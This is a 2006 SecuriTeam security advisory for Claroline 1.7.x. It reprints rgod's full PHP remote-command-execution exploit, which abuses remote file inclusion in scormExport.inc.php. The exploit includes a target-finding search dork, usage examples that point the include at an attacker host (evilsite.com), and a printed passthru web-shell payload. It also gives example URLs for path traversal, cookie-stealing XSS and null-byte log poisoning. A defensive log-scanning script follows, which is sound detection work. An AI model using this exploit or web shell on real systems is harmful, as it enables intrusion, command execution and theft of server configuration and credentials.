[EXPL] Claroline Remote Code Execution (Exploit)
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 7 Jun 2006 10:21:50 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Claroline Remote Code Execution (Exploit)
------------------------------------------------------------------------
SUMMARY
"Claroline (http://www.claroline.net/) is a free application based on
PHP/MySQL allowing teachers or education organizations to create and
administrate courses through the web."
Improper handling of user input allows attackers to execute arbitrary code
in Claroline.
DETAILS
Vulnerable Systems:
* Claroline version 1.7.6 and prior
Exploit:
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "Claroline <= 1.7.4 \"scormExport.inc.php\" remote cmmnds xctn\r\n";
echo "by rgod rgod at autistici.org\r\n";
echo "site: http://retrogod.altervista.org\r\n\r\n";
echo "-> works with register_globals = On & allow_url_fopen = On\r\n\r\n";
echo "dork: \"Powered by Claroline\" -demo\r\n\r\n";
// host, path, location and at least one command word are required
if ($argc<5) {
echo "Usage: php ".$argv[0]." host path location OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
echo "path: path to claroline\r\n";
echo "location: arbitrary location with the code to include\r\n";
echo "Options:\r\n";
echo " -p[port]: specify a port other than 80\r\n";
echo " -P[ip:port]: specify a proxy\r\n";
echo "Examples:\r\n";
echo "php ".$argv[0]." target.com /claroline174/ http://evilsite.com ls -la\r\n";
echo "php ".$argv[0]." target.com /claroline174/ http://evilsite.com cat /..\r\n";
echo "/../inc/conf/claro_main.conf.php -p81\r\n";
echo "php ".$argv[0]." target.com / http://evilsite.com uname -a -P1.1.1.1:80\r\n\r\n";
echo "note, on remote location you need a\r\n";
echo "/lib/fileUpload.lib.php/index.html\r\n";
echo "or a\r\n";
echo "/lib/pclzip/pclzip.lib.php/index.html\r\n";
echo "with this code inside:\r\n\r\n";
// the included file echoes the command output between two *delim* markers,
// which the code below uses to cut it out of the HTML response
echo "<?php\r\n";
echo 'if (get_magic_quotes_gpc()){$_GET[cmd]=stripslashes($_GET[cmd]);}'."\r\n";
echo "error_reporting(0);\r\n";
echo 'ini_set("max_execution_time",0);'."\r\n";
echo 'echo "*delim*";'."\r\n";
echo 'passthru($_GET[cmd]);'."\r\n";
echo 'echo "*delim*";'."\r\n";
echo "die;\r\n";
echo '?>'."\r\n";
die;
}
/*
explanation:
software site: http://www.claroline.net/
description: Claroline is a free application based on PHP/MySQL allowing
teachers or education organizations to create and administrate
courses through the web.
vulnerabilities:
i) system disclosure:
without having an account you can see (not modify or include) all files
on the target system regardless of any php.ini settings, ex:
http://[target]/[path_to_claroline]/claroline/document/rqmkhtml.php?cmd=rqEditHtml&file=/../../../../apache/logs/error.log
http://[target]/[path_to_claroline]/claroline/document/rqmkhtml.php?cmd=rqEditHtml&file=/../../claroline/inc/conf/claro_main.conf.php
(see inside html for this)
ii) xss & full path disclosure:
http://[target]/[path_to_claroline]/claroline/document/rqmkhtml.php?cmd=rqEditHtml&file="><script>alert(document.cookie)</script>
iii) and finally, arbitrary remote inclusion / remote commands execution:
iii.a) if register_globals = On & allow_url_fopen = On:
http://[target]/[path_to_claroline]/claroline/learnPath/include/scormExport.inc.php?cmd=ls-la&includePath=http://evil.site.com
where on:
http://evil.site.com/lib/fileUpload.lib.php/index.html
or:
http://evil.site.com/lib/pclzip/pclzip.lib.php/index.html
you have some php code
iii.b) if register_globals = On & magic_quotes_gpc = Off:
http://[target]/[path_to_claroline]/claroline/learnPath/include/scormExport.inc.php?cmd=ls-la&includePath=/../../../../apache/logs/access.log%00
(after you have injected some code into the Apache log files and broken the
path through a null char)
this is the exploit for iii.a)
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;
}
$host=$argv[1];$path=$argv[2];$location=$argv[3];$cmd='';
if (($path[0]<>'/') | ($path[strlen($path)-1]<>'/'))
{die("Check the path, it must begin and end with a trailing slash\r\n");}
$port=80;$proxy="";
for ($i=4; $i<=$argc-1; $i++)
{
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P")) {$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
// through a proxy the request line needs an absolute URL, otherwise a path is enough
if ($proxy<>'') {$p="http://".$host.":".$port.$path;} else {$p=$path;}
$packet ="GET ".$p."claroline/learnPath/include/scormExport.inc.php";
$packet.="?cmd=".urlencode($cmd)."&includePath=".urlencode($location)." HTTP/1.0\r\n";
$packet.="User-Agent: Googlebot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
#debug
#echo quick_dump($packet);
sendpacketii($packet);
if (strstr($html,"*delim*"))
{
echo "Exploit succeeded...\r\n\r\n";
$temp=explode("*delim*",$html);
echo $temp[1];
}
else
{echo "Exploit failed...";}
?>
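As an added defender's example, not part of the advisory or of rgod's exploit: a small Python scanner that reads Apache combined-format access-log lines and flags the three request shapes the exploit's comment block describes (a URL in scormExport.inc.php's includePath, ../ traversal in rqmkhtml.php's file parameter, and a %00-terminated includePath). The log lines are constructed samples; the script and parameter names are the ones the advisory gives.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in Apache combined-log format, modelled on the
# request shapes the advisory describes; this is not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [07/Jun/2006:10:21:50 +0200] "GET /claroline/learnPath/include/scormExport.inc.php?cmd=ls-la&includePath=http://evil.site.com HTTP/1.0" 200 512 "-" "Googlebot/2.1"
203.0.113.7 - - [07/Jun/2006:10:22:01 +0200] "GET /claroline/document/rqmkhtml.php?cmd=rqEditHtml&file=/../../claroline/inc/conf/claro_main.conf.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [07/Jun/2006:10:22:30 +0200] "GET /claroline/learnPath/include/scormExport.inc.php?cmd=ls-la&includePath=/../../../../apache/logs/access.log%00 HTTP/1.1" 200 64 "-" "Mozilla/5.0"
198.51.100.2 - - [07/Jun/2006:10:23:00 +0200] "GET /claroline/document/rqmkhtml.php?cmd=rqEditHtml&file=lesson1.html HTTP/1.1" 200 900 "-" "Mozilla/5.0"
198.51.100.2 - - [07/Jun/2006:10:23:05 +0200] "GET /claroline/index.php HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
"""

# Combined-log prefix: client, identd, user, timestamp, then the request line.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"')

# Scripts named in the advisory and the parameter each one uses unchecked.
WATCHED_PARAMS = {
    "scormexport.inc.php": ("includePath",),
    "rqmkhtml.php": ("file",),
}


def classify(value):
    """Return the attack classes a (decoded) parameter value matches."""
    v = unquote(value)  # second decode also catches double-encoded values
    kinds = []
    if re.match(r"[a-z][a-z0-9+.-]*://", v, re.I):
        kinds.append("remote-file-inclusion")  # iii.a: includePath is a URL
    if "\x00" in v:
        kinds.append("null-byte-truncation")  # iii.b: %00 drops the appended suffix
    if re.search(r"(^|/)\.\.(/|$)", v):
        kinds.append("path-traversal")  # i / iii.b: ../ escapes the document root
    return kinds


def scan_log(text):
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        script = url.path.rsplit("/", 1)[-1].lower()
        query = parse_qs(url.query, keep_blank_values=True)
        for param in WATCHED_PARAMS.get(script, ()):
            for raw in query.get(param, []):
                kinds = classify(raw)
                if kinds:
                    hits.append({"ip": m.group("ip"), "time": m.group("ts"),
                                 "script": script, "param": param, "kinds": kinds})
    return hits
```

The User-Agent the exploit sends (Googlebot/2.1) is kept on the first sample line but is deliberately not used as a signal, since it is trivially changed.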
ADDITIONAL INFORMATION
The information has been provided by rgod <rgod@xxxxxxxxxxxxx>.
The original article can be found at:
http://retrogod.altervista.org/claroline_174_incl_xpl.html